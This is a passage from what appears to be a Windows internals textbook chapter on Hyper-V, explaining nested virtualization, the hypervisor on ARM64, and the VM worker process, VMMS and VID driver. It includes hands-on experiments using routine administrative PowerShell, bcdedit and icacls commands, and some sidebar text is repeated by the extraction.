instance of the hypervisor (which, in this case, is identified as L1 hypervisor, where L1 stands for Level 1),
by using the emulated virtualization extensions exposed by the L0 hypervisor. The L1 hypervisor creates
the nested root partition and starts the L2 root operating system in it. In the same way, the L2 root can
orchestrate with the L1 hypervisor to launch a nested guest VM. The final guest VM in this configuration
takes the name of L2 guest.
Windows Root OS
Windows Root OS
Guest OS
Level 1
Level 2
Level 0
Hyper-V Hypervisor
Hyper-V Hypervisor
Hardware Layer: Intel Processor w/VT-x
VT-x Extensions
VT-x Extensions
CPU
vCPU
FIGURE 9-20 Nested virtualization scheme.
Nested virtualization is a software construction: the hypervisor must be able to emulate and
manage virtualization extensions. Each virtualization instruction, while executed by the L1 guest VM,
causes a VMEXIT to the L0 hypervisor, which, through its emulator, can reconstruct the instruction and
perform the needed work to emulate it. At the time of this writing, only Intel and AMD hardware is
supported. The nested virtualization capability should be explicitly enabled for the L1 virtual machine;
308
CHAPTER 9 Virtualization technologies
otherwise, the L0 hypervisor injects a general protection exception in the VM in case a virtualization
instruction is executed by the guest operating system.
On Intel hardware, Hyper-V allows nested virtualization to work thanks to two main concepts:
I
Emulation of the VT-x virtualization extensions
I
Nested address translation
As discussed previously in this section, for Intel hardware, the basic data structure that describes
a virtual machine is the virtual machine control structure (VMCS). Other than the standard physical
VMCS representing the L1 VM, when the L0 hypervisor creates a VP belonging to a partition that sup-
ports nested virtualization, it allocates some nested VMCS data structures (not to be confused with a
virtual VMCS, which is a different concept). The nested VMCS is a software descriptor that contains all
the information needed by the L0 hypervisor to start and run a nested VP for a L2 partition. As briefly
introduced in the “Hypervisor startup” section, when the L1 hypervisor boots, it detects whether it’s
running in a virtualized environment and, if so, enables various nested enlightenments, like the enlight-
ened VMCS or the direct virtual flush (discussed later in this section).
As shown in Figure 9-21, for each nested VMCS, the L0 hypervisor also allocates a Virtual VMCS and a
hardware physical VMCS, two similar data structures representing a VP running the L2 virtual machine.
The virtual VMCS is important because it has the key role in maintaining the nested virtualized data. The
physical VMCS instead is loaded by the L0 hypervisor when the L2 virtual machine is started; this happens
when the L0 hypervisor intercepts a VMLAUNCH instruction executed by the L1 hypervisor.
L 1
L0
Nested VMCS Cache
VP 2
*-Represents a VP in the L2 VM
-Represents a VP in the L1 Hypervisor
Nested VMCS
Virtual
VMCS*
Physical
VMCS*
Physical
VMCS
Nested VMCS
Virtual
VMCS*
Physical
VMCS*
Nested VMCS
Virtual
VMCS*
Physical
VMCS*
L1 VP 1
…
L1 VP 0
L1 VP 2
FIGURE 9-21 A L0 hypervisor running a L2 VM by virtual processor 2.
In the sample picture, the L0 hypervisor has scheduled the VP 2 for running a L2 VM managed by
the L1 hypervisor (through the nested virtual processor 1). The L1 hypervisor can operate only on virtu-
alization data replicated in the virtual VMCS.
CHAPTER 9 Virtualization technologies
309
Emulation of the VT-x virtualization extensions
On Intel hardware, the L0 hypervisor supports both enlightened and nonenlightened L1 hypervisors.
The only official supported configuration is Hyper-V running on the top of Hyper-V, though.
In a nonenlightened hypervisor, all the VT-x instructions executed in the L1 guest causes a VMEXIT.
After the L1 hypervisor has allocated the guest physical VMCS for describing the new L2 VM, it usually
marks it as active (through the VMPTRLD instruction on Intel hardware). The L0 hypervisor intercepts
the operation and associates an allocated nested VMCS with the guest physical VMCS specified by the
L1 hypervisor. Furthermore, it fills the initial values for the virtual VMCS and sets the nested VMCS as
active for the current VP. (It does not switch the physical VMCS though; the execution context should
remain the L1 hypervisor.) Each subsequent read or write to the physical VMCS performed by the L1
hypervisor is always intercepted by the L0 hypervisor and redirected to the virtual VMCS (refer to
Figure 9-21).
When the L1 hypervisor launches the VM (performing an operation called VMENTRY), it executes a
specific hardware instruction (VMLAUNCH on Intel hardware), which is intercepted by the L0 hypervi-
sor. For nonenlightened scenarios, the L0 hypervisor copies all the guest fields of the virtual VMCS to
another physical VMCS representing the L2 VM, writes the host fields by pointing them to L0 hypervi-
sor’s entry points, and sets it as active (by using the hardware VMPTRLD instruction on Intel platforms).
In case the L1 hypervisor uses the second level address translation (EPT for Intel hardware), the L0
hypervisor then shadows the currently active L1 extended page tables (see the following section for
more details). Finally, it performs the actual VMENTRY by executing the specific hardware instruction.
As a result, the hardware executes the L2 VM’s code.
While executing the L2 VM, each operation that causes a VMEXIT switches the execution con-
text back to the L0 hypervisor (instead of the L1). As a response, the L0 hypervisor performs another
VMENTRY on the original physical VMCS representing the L1 hypervisor context, injecting a synthetic
VMEXIT event. The L1 hypervisor restarts the execution and handles the intercepted event as for regu-
lar non-nested VMEXITs. When the L1 completes the internal handling of the synthetic VMEXIT event, it
executes a VMRESUME operation, which will be intercepted again by the L0 hypervisor and managed in
a similar way of the initial VMENTRY operation described earlier.
Producing a VMEXIT each time the L1 hypervisor executes a virtualization instruction is an expensive
operation, which could definitively contribute in the general slowdown of the L2 VM. For overcoming
this problem, the Hyper-V hypervisor supports the enlightened VMCS, an optimization that, when en-
abled, allows the L1 hypervisor to load, read, and write virtualization data from a memory page shared
between the L1 and L0 hypervisor (instead of a physical VMCS). The shared page is called enlightened
VMCS. When the L1 hypervisor manipulates the virtualization data belonging to a L2 VM, instead of
using hardware instructions, which cause a VMEXIT into the L0 hypervisor, it directly reads and writes
from the enlightened VMCS. This significantly improves the performance of the L2 VM.
In enlightened scenarios, the L0 hypervisor intercepts only VMENTRY and VMEXIT operations (and
some others that are not relevant for this discussion). The L0 hypervisor manages VMENTRY in a similar
way to the nonenlightened scenario, but, before doing anything described previously, it copies the
virtualization data located in the shared enlightened VMCS memory page to the virtual VMCS repre-
senting the L2 VM.
310
CHAPTER 9 Virtualization technologies
Note It is worth mentioning that for nonenlightened scenarios, the L0 hypervisor supports
another technique for preventing VMEXITs while managing nested virtualization data, called
shadow VMCS. Shadow VMCS is a hardware optimization very similar to the enlightened VMCS.
Nested address translation
As previously discussed in the “Partitions’ physical address space” section, the hypervisor uses the SLAT
for providing an isolated guest physical address space to a VM and to translate GPAs to real SPAs. Nested
virtual machines would require another hardware layer of translation on top of the two already existing.
For supporting nested virtualization, the new layer should have been able to translate L2 GPAs to L1 GPAs.
Due to the increased complexity in the electronics needed to build a processor’s MMU that manages
three layers of translations, the Hyper-V hypervisor adopted another strategy for providing the additional
layer of address translation, called shadow nested page tables. Shadow nested page tables use a tech-
nique similar to the shadow paging (see the previous section) for directly translating L2 GPAs to SPAs.
When a partition that supports nested virtualization is created, the L0 hypervisor allocates and initial-
izes a nested page table shadowing domain. The data structure is used for storing a list of shadow nested
page tables associated with the different L2 VMs created in the partition. Furthermore, it stores the parti-
tion’s active domain generation number (discussed later in this section) and nested memory statistics.
When the L0 hypervisor performs the initial VMENTRY for starting a L2 VM, it allocates the shadow
nested page table associated with the VM and initializes it with empty values (the resulting physical
address space is empty). When the L2 VM begins code execution, it immediately produces a VMEXIT
to the L0 hypervisor due to a nested page fault (EPT violation in Intel hardware). The L0 hypervisor,
instead of injecting the fault in the L1, walks the guest’s nested page tables built by the L1 hypervisor. If
it finds a valid entry for the specified L2 GPA, it reads the corresponding L1 GPA, translates it to an SPA,
and creates the needed shadow nested page table hierarchy to map it in the L2 VM. It then fills the leaf
table entry with the valid SPA (the hypervisor uses large pages for mapping shadow nested pages) and
resumes the execution directly to the L2 VM by setting the nested VMCS that describes it as active.
For the nested address translation to work correctly, the L0 hypervisor should be aware of any modi-
fications that happen to the L1 nested page tables; otherwise, the L2 VM could run with stale entries.
This implementation is platform specific; usually hypervisors protect the L2 nested page table for read-
only access. In that way they can be informed when the L1 hypervisor modifies it. The Hyper-V hypervi-
sor adopts another smart strategy, though. It guarantees that the shadow nested page table describing
the L2 VM is always updated because of the following two premises:
I
When the L1 hypervisor adds new entries in the L2 nested page table, it does not perform any
other action for the nested VM (no intercepts are generated in the L0 hypervisor). An entry in
the shadow nested page table is added only when a nested page fault causes a VMEXIT in the
L0 hypervisor (the scenario described previously).
I
As for non-nested VM, when an entry in the nested page table is modified or deleted, the
hypervisor should always emit a TLB flush for correctly invalidating the hardware TLB. In case
CHAPTER 9 Virtualization technologies
311
of nested virtualization, when the L1 hypervisor emits a TLB flush, the L0 intercepts the request
and completely invalidates the shadow nested page table. The L0 hypervisor maintains a virtual
TLB concept thanks to the generation IDs stored in both the shadow VMCS and the nested
page table shadowing domain. (Describing the virtual TLB architecture is outside the scope
of the book.)
Completely invalidating the shadow nested page table for a single address changed seems to be
redundant, but it’s dictated by the hardware support. (The INVEPT instruction on Intel hardware does
not allow specifying which single GPA to remove from the TLB.) In classical VMs, this is not a problem
because modifications on the physical address space don’t happen very often. When a classical VM is
started, all its memory is already allocated. (The “Virtualization stack” section will provide more de-
tails.) This is not true for VA-backed VMs and VSM, though.
For improving performance in nonclassical nested VMs and VSM scenarios (see the next section
for details), the hypervisor supports the “direct virtual flush” enlightenment, which provides to the L1
hypervisor two hypercalls to directly invalidate the TLB. In particular, the HvFlushGuestPhysicalAddress
List hypercall (documented in the TLFS) allows the L1 hypervisor to invalidate a single entry in the
shadow nested page table, removing the performance penalties associated with the flushing of the
entire shadow nested page table and the multiple VMEXIT needed to reconstruct it.
EXPERIMENT: Enabling nested virtualization on Hyper-V
As explained in this section, for running a virtual machine into a L1 Hyper-V VM, you should first
enable the nested virtualization feature in the host system. For this experiment, you need a work-
station with an Intel or AMD CPU and Windows 10 or Windows Server 2019 installed (Anniversary
Update RS1 minimum version). You should create a Type-2 VM using the Hyper-V Manager or
Windows PowerShell with at least 4 GB of memory. In the experiment, you’re creating a nested L2
VM into the created VM, so enough memory needs to be assigned.
After the first startup of the VM and the initial configuration, you should shut down the VM
and open an administrative PowerShell window (type Windows PowerShell in the Cortana
search box. Then right-click the PowerShell icon and select Run As Administrator). You should
then type the following command, where the term “<VmName>” must be replaced by your
virtual machine name:
Set-VMProcessor -VMName "<VmName>" -ExposeVirtualizationExtension $true
To properly verify that the nested virtualization feature is correctly enabled, the command
$(Get-VMProcessor -VMName "<VmName>").ExposeVirtualizationExtensions
should return True.
After the nested virtualization feature has been enabled, you can restart your VM. Before
being able to run the L1 hypervisor in the virtual machine, you should add the necessary com-
ponent through the Control panel. In the VM, search Control Panel in the Cortana box, open it,
click Programs, and the select Turn Windows Features On Or Off. You should check the entire
Hyper-V tree, as shown in the next figure.
EXPERIMENT: Enabling nested virtualization on Hyper-V
As explained in this section, for running a virtual machine into a L1 Hyper-V VM, you should first
enable the nested virtualization feature in the host system. For this experiment, you need a work-
station with an Intel or AMD CPU and Windows 10 or Windows Server 2019 installed (Anniversary
Update RS1 minimum version). You should create a Type-2 VM using the Hyper-V Manager or
Windows PowerShell with at least 4 GB of memory. In the experiment, you’re creating a nested L2
VM into the created VM, so enough memory needs to be assigned.
After the first startup of the VM and the initial configuration, you should shut down the VM
and open an administrative PowerShell window (type Windows PowerShell in the Cortana
search box. Then right-click the PowerShell icon and select Run As Administrator). You should
then type the following command, where the term “<VmName>” must be replaced by your
“<VmName>” must be replaced by your
“<VmName>”
virtual machine name:
Set-VMProcessor -VMName "<VmName>" -ExposeVirtualizationExtension $true
To properly verify that the nested virtualization feature is correctly enabled, the command
$(Get-VMProcessor -VMName "<VmName>").ExposeVirtualizationExtensions
should return True.
After the nested virtualization feature has been enabled, you can restart your VM. Before
being able to run the L1 hypervisor in the virtual machine, you should add the necessary com-
ponent through the Control panel. In the VM, search Control Panel in the Cortana box, open it,
click Programs, and the select Turn Windows Features On Or Off. You should check the entire
Hyper-V tree, as shown in the next figure.
312
CHAPTER 9 Virtualization technologies
Click OK. After the procedure finishes, click Restart to reboot the virtual machine (this step
is needed). After the VM restarts, you can verify the presence of the L1 hypervisor through
the System Information application (type msinfo32 in the Cortana search box. Refer to the
“Detecting VBS and its provided services” experiment later in this chapter for further details).
If the hypervisor has not been started for some reason, you can force it to start by opening an
administrative command prompt in the VM (type cmd in the Cortana search box and select Run
As Administrator) and insert the following command:
bcdedit /set {current} hypervisorlaunchtype Auto
At this stage, you can use the Hyper-V Manager or Windows PowerShell to create a L2 guest
VM directly in your virtual machine. The result can be something similar to the following figure.
Click OK. After the procedure finishes, click Restart to reboot the virtual machine (this step
is needed). After the VM restarts, you can verify the presence of the L1 hypervisor through
the System Information application (type msinfo32 in the Cortana search box. Refer to the
“Detecting VBS and its provided services” experiment later in this chapter for further details).
If the hypervisor has not been started for some reason, you can force it to start by opening an
administrative command prompt in the VM (type cmd in the Cortana search box and select Run
As Administrator) and insert the following command:
bcdedit /set {current} hypervisorlaunchtype Auto
At this stage, you can use the Hyper-V Manager or Windows PowerShell to create a L2 guest
VM directly in your virtual machine. The result can be something similar to the following figure.
CHAPTER 9 Virtualization technologies
313
From the L2 root partition, you can also enable the L1 hypervisor debugger, in a similar way
as explained in the “Connecting the hypervisor debugger” experiment previously in this chapter.
The only limitation at the time of this writing is that you can’t use the network debugging in nest-
ed configurations; the only supported configuration for debugging the L1 hypervisor is through
serial port. This means that in the host system, you should enable two virtual serial ports in the
L1 VM (one for the hypervisor and the other one for the L2 root partition) and attach them to
named pipes. For type-2 virtual machines, you should use the following PowerShell commands
to set the two serial ports in the L1 VM (as with the previous commands, you should replace the
term “<VMName>” with the name of your virtual machine):
Set-VMComPort -VMName "<VMName>" -Number 1 -Path \\.\pipe\HV_dbg
Set-VMComPort -VMName "<VMName>" -Number 2 -Path \\.\pipe\NT_dbg
After that, you should configure the hypervisor debugger to be attached to the COM1 serial
port, while the NT kernel debugger should be attached to the COM2 (see the previous experi-
ment for more details).
The Windows hypervisor on ARM64
Unlike the x86 and AMD64 architectures, where the hardware virtualization support was added long
after their original design, the ARM64 architecture has been designed with hardware virtualization
support. In particular, as shown in Figure 9-22, the ARM64 execution environment has been split in
three different security domains (called Exception Levels). The EL determines the level of privilege; the
higher the EL, the more privilege the executing code has. Although all the user mode applications run
in EL0, the NT kernel (and kernel mode drivers) usually runs in EL1. In general, a piece of software runs
only in a single exception level. EL2 is the privilege level designed for running the hypervisor (which,
in ARM64 is also called “Virtual machine manager”) and is an exception to this rule. The hypervisor pro-
vides virtualization services and can run in Nonsecure World both in EL2 and EL1. (EL2 does not exist in
the Secure World. ARM TrustZone will be discussed later in this section.)
Non-Secure World
Application
Kernel
Secure World
Trusted Application
Secure Kernel
Hypervisor
EL0
EL1
EL2
EL3
Monitor
FIGURE 9-22 The ARM64 execution environment.
From the L2 root partition, you can also enable the L1 hypervisor debugger, in a similar way
as explained in the “Connecting the hypervisor debugger” experiment previously in this chapter.
The only limitation at the time of this writing is that you can’t use the network debugging in nest-
ed configurations; the only supported configuration for debugging the L1 hypervisor is through
serial port. This means that in the host system, you should enable two virtual serial ports in the
L1 VM (one for the hypervisor and the other one for the L2 root partition) and attach them to
named pipes. For type-2 virtual machines, you should use the following PowerShell commands
to set the two serial ports in the L1 VM (as with the previous commands, you should replace the
term “<VMName>” with the name of your virtual machine):
“<VMName>” with the name of your virtual machine):
“<VMName>”
Set-VMComPort -VMName "<VMName>" -Number 1 -Path \\.\pipe\HV_dbg
Set-VMComPort -VMName "<VMName>" -Number 2 -Path \\.\pipe\NT_dbg
After that, you should configure the hypervisor debugger to be attached to the COM1 serial
port, while the NT kernel debugger should be attached to the COM2 (see the previous experi-
ment for more details).
314
CHAPTER 9 Virtualization technologies
Unlike from the AMD64 architecture, where the CPU enters the root mode (the execution domain
in which the hypervisor runs) only from the kernel context and under certain assumptions, when a
standard ARM64 device boots, the UEFI firmware and the boot manager begin their execution in EL2.
On those devices, the hypervisor loader (or Secure Launcher, depending on the boot flow) is able to
start the hypervisor directly and, at later time, drop the exception level to EL1 (by emitting an exception
return instruction, also known as ERET).
On the top of the exception levels, TrustZone technology enables the system to be partitioned be-
tween two execution security states: secure and non-secure. Secure software can generally access both
secure and non-secure memory and resources, whereas normal software can only access non-secure
memory and resources. The non-secure state is also referred to as the Normal World. This enables an
OS to run in parallel with a trusted OS on the same hardware and provides protection against certain
software attacks and hardware attacks. The secure state, also referred as Secure World, usually runs se-
cure devices (their firmware and IOMMU ranges) and, in general, everything that requires the proces-
sor to be in the secure state.
To correctly communicate with the Secure World, the non-secure OS emits secure method calls
(SMC), which provide a mechanism similar to standard OS syscalls. SMC are managed by the TrustZone.
TrustZone usually provides separation between the Normal and the Secure Worlds through a thin
memory protection layer, which is provided by well-defined hardware memory protection units
(Qualcomm calls these XPUs). The XPUs are configured by the firmware to allow only specific execu-
tion environments to access specific memory locations. (Secure World memory can’t be accessed by
Normal World software.)
In ARM64 server machines, Windows is able to directly start the hypervisor. Client machines often
do not have XPUs, even though TrustZone is enabled. (The majority of the ARM64 client devices in
which Windows can run are provided by Qualcomm.) In those client devices, the separation between
the Secure and Normal Worlds is provided by a proprietary hypervisor, named QHEE, which provides
memory isolation using stage-2 memory translation (this layer is the same as the SLAT layer used by the
Windows hypervisor). QHEE intercepts each SMC emitted by the running OS: it can forward the SMC
directly to TrustZone (after having verified the necessary access rights) or do some work on its behalf. In
these devices, TrustZone also has the important responsibility to load and verify the authenticity of the
machine firmware and coordinates with QHEE for correctly executing the Secure Launch boot method.
Although in Windows the Secure World is generally not used (a distinction between Secure/Non
secure world is already provided by the hypervisor through VTL levels), the Hyper-V hypervisor still
runs in EL2. This is not compatible with the QHEE hypervisor, which runs in EL2, too. To solve the prob-
lem correctly, Windows adopts a particular boot strategy; the Secure launch process is orchestrated
with the aid of QHEE. When the Secure Launch terminates, the QHEE hypervisor unloads and gives up
execution to the Windows hypervisor, which has been loaded as part of the Secure Launch. In later
boot stages, after the Secure Kernel has been launched and the SMSS is creating the first user mode
session, a new special trustlet is created (Qualcomm named it as “QcExt”). The trustlet acts as the origi-
nal ARM64 hypervisor; it intercepts all the SMC requests, verifies the integrity of them, provides the
needed memory isolations (through the services exposed by the Secure Kernel) and is able to send and
receive commands from the Secure Monitor in EL3.
CHAPTER 9 Virtualization technologies
315
The SMC interception architecture is implemented in both the NT kernel and the ARM64 trustlet
and is outside the scope of this book. The introduction of the new trustlet has allowed the majority of
the client ARM64 machines to boot with Secure Launch and Virtual Secure Mode enabled by default.
(VSM is discussed later in this chapter.)
The virtualization stack
Although the hypervisor provides isolation and the low-level services that manage the virtualization
hardware, all the high-level implementation of virtual machines is provided by the virtualization stack.
The virtualization stack manages the states of the VMs, provides memory to them, and virtualizes the
hardware by providing a virtual motherboard, the system firmware, and multiple kind of virtual devices
(emulated, synthetic, and direct access). The virtualization stack also includes VMBus, an important
component that provides a high-speed communication channel between a guest VM and the root
partition and can be accessed through the kernel mode client library (KMCL) abstraction layer.
In this section, we discuss some important services provided by the virtualization stack and analyze
its components. Figure 9-23 shows the main components of the virtualization stack.
Root Partition / Host OS
VmCompute
VMWP
VMMS
VSPs
Physical
Device
Drivers
VMBus
VID.sys
WinHvr.sys
Hypervisor
Hardware
VDEVs
Child Partition
Guest OS
VSCs
Virtual
Device
Drivers
VMBus
WinHv.sys
FIGURE 9-23 Components of the virtualization stack.
Virtual machine manager service and worker processes
The virtual machine manager service (Vmms.exe) is responsible for providing the Windows
Management Instrumentation (WMI) interface to the root partition, which allows managing the
child partitions through a Microsoft Management Console (MMC) plug-in or through PowerShell.
The VMMS service manages the requests received through the WMI interface on behalf of a VM
(identified internally through a GUID), like start, power off, shutdown, pause, resume, reboot, and so
on. It controls settings such as which devices are visible to child partitions and how the memory and
316
CHAPTER 9 Virtualization technologies
processor allocation for each partition is defined. The VMMS manages the addition and removal of
devices. When a virtual machine is started, the VMM Service also has the crucial role of creating a
corresponding Virtual Machine Worker Process (VMWP.exe). The VMMS manages the VM snapshots
by redirecting the snapshot requests to the VMWP process in case the VM is running or by taking the
snapshot itself in the opposite case.
The VMWP performs various virtualization work that a typical monolithic hypervisor would per-
form (similar to the work of a software-based virtualization solution). This means managing the state
machine for a given child partition (to allow support for features such as snapshots and state transi-
tions), responding to various notifications coming in from the hypervisor, performing the emulation
of certain devices exposed to child partitions (called emulated devices), and collaborating with the VM
service and configuration component. The Worker process has the important role to start the virtual
motherboard and to maintain the state of each virtual device that belongs to the VM. It also includes
components responsible for remote management of the virtualization stack, as well as an RDP compo-
nent that allows using the remote desktop client to connect to any child partition and remotely view its
user interface and interact with it. The VM Worker process exposes the COM objects that provide the
interface used by the Vmms (and the VmCompute service) to communicate with the VMWP instance
that represents a particular virtual machine.
The VM host compute service (implemented in the Vmcompute.exe and Vmcompute.dll binaries) is
another important component that hosts most of the computation-intensive operations that are not
implemented in the VM Manager Service. Operation like the analysis of a VM’s memory report (for
dynamic memory), management of VHD and VHDX files, and creation of the base layers for containers
are implemented in the VM host compute service. The Worker Process and Vmms can communicate
with the host compute service thanks the COM objects that it exposes.
The Virtual Machine Manager Service, the Worker Process, and the VM compute service are able to
open and parse multiple configuration files that expose a list of all the virtual machines created in the
system, and the configuration of each of them. In particular:
I
The configuration repository stores the list of virtual machines installed in the system, their
names, configuration file and GUID in the data.vmcx file located in C:\ProgramData\Microsoft
\Windows Hyper-V.
I
The VM Data Store repository (part of the VM host compute service) is able to open, read, and
write the configuration file (usually with “.vmcx” extension) of a VM, which contains the list of
virtual devices and the virtual hardware’s configuration.
The VM data store repository is also used to read and write the VM Save State file. The VM State file
is generated while pausing a VM and contains the save state of the running VM that can be restored
at a later time (state of the partition, content of the VM’s memory, state of each virtual device). The
configuration files are formatted using an XML representation of key/value pairs. The plain XML data
is stored compressed using a proprietary binary format, which adds a write-journal logic to make it
resilient against power failures. Documenting the binary format is outside the scope of this book.
CHAPTER 9 Virtualization technologies
317
The VID driver and the virtualization stack memory manager
The Virtual Infrastructure Driver (VID.sys) is probably one of the most important components of the
virtualization stack. It provides partition, memory, and processor management services for the virtual
machines running in the child partition, exposing them to the VM Worker process, which lives in the
root. The VM Worker process and the VMMS services use the VID driver to communicate with the
hypervisor, thanks to the interfaces implemented in the Windows hypervisor interface driver (WinHv.
sys and WinHvr.sys), which the VID driver imports. These interfaces include all the code to support the
hypervisor’s hypercall management and allow the operating system (or generic kernel mode drivers) to
access the hypervisor using standard Windows API calls instead of hypercalls.
The VID driver also includes the virtualization stack memory manager. In the previous section, we
described the hypervisor memory manager, which manages the physical and virtual memory of the
hypervisor itself. The guest physical memory of a VM is allocated and managed by the virtualization
stack’s memory manager. When a VM is started, the spawned VM Worker process (VMWP.exe) invokes
the services of the memory manager (defined in the IMemoryManager COM interface) for constructing
the guest VM’s RAM. Allocating memory for a VM is a two-step process:
1.
The VM Worker process obtains a report of the global system’s memory state (by using services
from the Memory Balancer in the VMMS process), and, based on the available system memory,
determines the size of the physical memory blocks to request to the VID driver (through the
VID_RESERVE IOCTL. Sizes of the block vary from 64 MB up to 4 GB). The blocks are allocated by
the VID driver using MDL management functions (MmAllocatePartitionNodePagesForMdlEx in
particular). For performance reasons, and to avoid memory fragmentation, the VID driver imple-
ments a best-effort algorithm to allocate huge and large physical pages (1 GB and 2 MB) before
relying on standard small pages. After the memory blocks are allocated, their pages are depos-
ited to an internal “reserve” bucket maintained by the VID driver. The bucket contains page lists
ordered in an array based on their quality of service (QOS). The QOS is determined based on the
page type (huge, large, and small) and the NUMA node they belong to. This process in the VID
nomenclature is called “reserving physical memory” (not to be confused with the term “reserving
virtual memory,” a concept of the NT memory manager).
2.
From the virtualization stack perspective, physical memory commitment is the process of
emptying the reserved pages in the bucket and moving them in a VID memory block (VSMM_
MEMORY_BLOCK data structure), which is created and owned by the VM Worker process
using the VID driver’s services. In the process of creating a memory block, the VID driver
first deposits additional physical pages in the hypervisor (through the Winhvr driver and the
HvDepositMemory hypercall). The additional pages are needed for creating the SLAT table
page hierarchy of the VM. The VID driver then requests to the hypervisor to map the physical
pages describing the entire guest partition’s RAM. The hypervisor inserts valid entries in the
SLAT table and sets their proper permissions. The guest physical address space of the partition
is created. The GPA range is inserted in a list belonging to the VID partition. The VID memory
block is owned by the VM Worker process. It’s also used for tracking guest memory and in DAX
file-backed memory blocks. (See Chapter 11, “Caching and file system support,” for more details
about DAX volumes and PMEM.) The VM Worker process can later use the memory block for
multiple purposes—for example, to access some pages while managing emulated devices.
318
CHAPTER 9 Virtualization technologies
The birth of a Virtual Machine (VM)
The process of starting up a virtual machine is managed primarily by the VMMS and VMWP pro-
cess. When a request to start a VM (internally identified by a GUID) is delivered to the VMMS service
(through PowerShell or the Hyper-V Manager GUI application), the VMMS service begins the starting
process by reading the VM’s configuration from the data store repository, which includes the VM’s
GUID and the list of all the virtual devices (VDEVs) comprising its virtual hardware. It then verifies that
the path containing the VHD (or VHDX) representing the VM’s virtual hard disk has the correct ac-
cess control list (ACL, more details provided later). In case the ACL is not correct, if specified by the VM
configuration, the VMMS service (which runs under a SYSTEM account) rewrites a new one, which is
compatible with the new VMWP process instance. The VMMS uses COM services to communicate with
the Host Compute Service to spawn a new VMWP process instance.
The Host Compute Service gets the path of the VM Worker process by querying its COM registra-
tion data located in the Windows registry (HKCU\CLSID\{f33463e0-7d59-11d9-9916-0008744f51f3}
key). It then creates the new process using a well-defined access token, which is built using the virtual
machine SID as the owner. Indeed, the NT Authority of the Windows Security model defines a well-
known subauthority value (83) to identify VMs (more information on system security components
are available in Part 1, Chapter 7, “Security”). The Host Compute Service waits for the VMWP process
to complete its initialization (in this way the exposed COM interfaces become ready). The execution
returns to the VMMS service, which can finally request the starting of the VM to the VMWP process
(through the exposed IVirtualMachine COM interface).
As shown in Figure 9-24, the VM Worker process performs a “cold start” state transition for the
VM. In the VM Worker process, the entire VM is managed through services exposed by the “Virtual
Motherboard.” The Virtual Motherboard emulates an Intel i440BX motherboard on Generation 1
VMs, whereas on Generation 2, it emulates a proprietary motherboard. It manages and maintains the
list of virtual devices and performs the state transitions for each of them. As covered in the next sec-
tion, each virtual device is implemented as a COM object (exposing the IVirtualDevice interface) in a
DLL. The Virtual Motherboard enumerates each virtual device from the VM’s configuration and loads
the relative COM object representing the device.
The VM Worker process begins the startup procedure by reserving the resources needed by each
virtual device. It then constructs the VM guest physical address space (virtual RAM) by allocating physi-
cal memory from the root partition through the VID driver. At this stage, it can power up the virtual
motherboard, which will cycle between each VDEV and power it up. The power-up procedure is differ-
ent for each device: for example, synthetic devices usually communicate with their own Virtualization
Service Provider (VSP) for the initial setup.
One virtual device that deserves a deeper discussion is the virtual BIOS (implemented in the
Vmchipset.dll library). Its power-up method allows the VM to include the initial firmware executed
when the bootstrap VP is started. The BIOS VDEV extracts the correct firmware for the VM (legacy BIOS
in the case of Generation 1 VMs; UEFI otherwise) from the resource section of its own backing library,
builds the volatile configuration part of the firmware (like the ACPI and the SRAT table), and injects it
in the proper guest physical memory by using services provided by the VID driver. The VID driver is
indeed able to map memory ranges described by the VID memory block in user mode memory, acces-
sible by the VM Worker process (this procedure is internally called “memory aperture creation”).
CHAPTER 9 Virtualization technologies
319
Host Compute
Service
Hypervisor
IVirtualMachine COM Interface
VMWP
VID
VMBus
WinHV
VSPs
Cold Start
Root Partition / Host OS
User
Kernel
VirtualMachine
Partition
Manager
Memory
Manager
Virtual
Motherboard
…
FIGURE 9-24 The VM Worker process and its interface for performing a “cold start” of a VM.
After all the virtual devices have been successfully powered up, the VM Worker process can start the
bootstrap virtual processor of the VM by sending a proper IOCTL to the VID driver, which will start the VP
and its message pump (used for exchanging messages between the VID driver and the VM Worker process).
EXPERIMENT: Understanding the security of the VM Worker process and
the irtual hard disk files
In the previous section, we discussed how the VM Worker process is launched by the Host
Compute service (Vmcompute.exe) when a request to start a VM is delivered to the VMMS pro-
cess (through WMI). Before communicating with the Host Compute Service, the VMMS gener-
ates a security token for the new Worker process instance.
Three new entities have been added to the Windows security model to properly support virtual
machines (the Windows Security model has been extensively discussed in Chapter 7 of Part 1):
I
A “virtual machines” security group, identified with the S-1-5-83-0 security identifier.
I
A virtual machine security identifier (SID), based on the VM’s unique identifier (GUID). The
VM SID becomes the owner of the security token generated for the VM Worker process.
I
A VM Worker process security capability used to give applications running in
AppContainers access to Hyper-V services required by the VM Worker process.
EXPERIMENT: Understanding the security of the VM Worker process and
the irtual hard disk files
In the previous section, we discussed how the VM Worker process is launched by the Host
Compute service (Vmcompute.exe) when a request to start a VM is delivered to the VMMS pro-
cess (through WMI). Before communicating with the Host Compute Service, the VMMS gener-
ates a security token for the new Worker process instance.
Three new entities have been added to the Windows security model to properly support virtual
machines (the Windows Security model has been extensively discussed in Chapter 7 of Part 1):
I
A “virtual machines” security group, identified with the S-1-5-83-0 security identifier.
I
A virtual machine security identifier (SID), based on the VM’s unique identifier (GUID). The
VM SID becomes the owner of the security token generated for the VM Worker process.
I
A VM Worker process security capability used to give applications running in
AppContainers access to Hyper-V services required by the VM Worker process.
320
CHAPTER 9 Virtualization technologies
In this experiment, you will create a new virtual machine through the Hyper-V manager in a
location that’s accessible only to the current user and to the administrators group, and you will
check how the security of the VM files and the VM Worker process change accordingly.
First, open an administrative command prompt and create a folder in one of the workstation’s
volumes (in the example we used C:\TestVm), using the following command:
md c:\TestVm
Then you need to strip off all the inherited ACEs (Access control entries; see Chapter 7 of Part 1
for further details) and add full access ACEs for the administrators group and the current logged-
on user. The following commands perform the described actions (you need to replace C:\TestVm
with the path of your directory and <UserName> with your currently logged-on user name):
icacls c:\TestVm /inheritance:r
icacls c:\TestVm /grant Administrators:(CI)(OI)F
icacls c:\TestVm /grant <UserName>:(CI)(OI)F
To verify that the folder has the correct ACL, you should open File Explorer (by pressing Win+E
on your keyboard), right-click the folder, select Properties, and finally click the Security tab. You
should see a window like the following one:
Open the Hyper-V Manager, create a VM (and its relative virtual disk), and store it in the newly
created folder (procedure available at the following page: https://docs.microsoft.com/en-us
/virtualization/hyper-v-on-windows/quick-start/create-virtual-machine). For this experiment, you
don’t really need to install an OS on the VM. After the New Virtual Machine Wizard ends, you
should start your VM (in the example, the VM is VM1).
In this experiment, you will create a new virtual machine through the Hyper-V manager in a
location that’s accessible only to the current user and to the administrators group, and you will
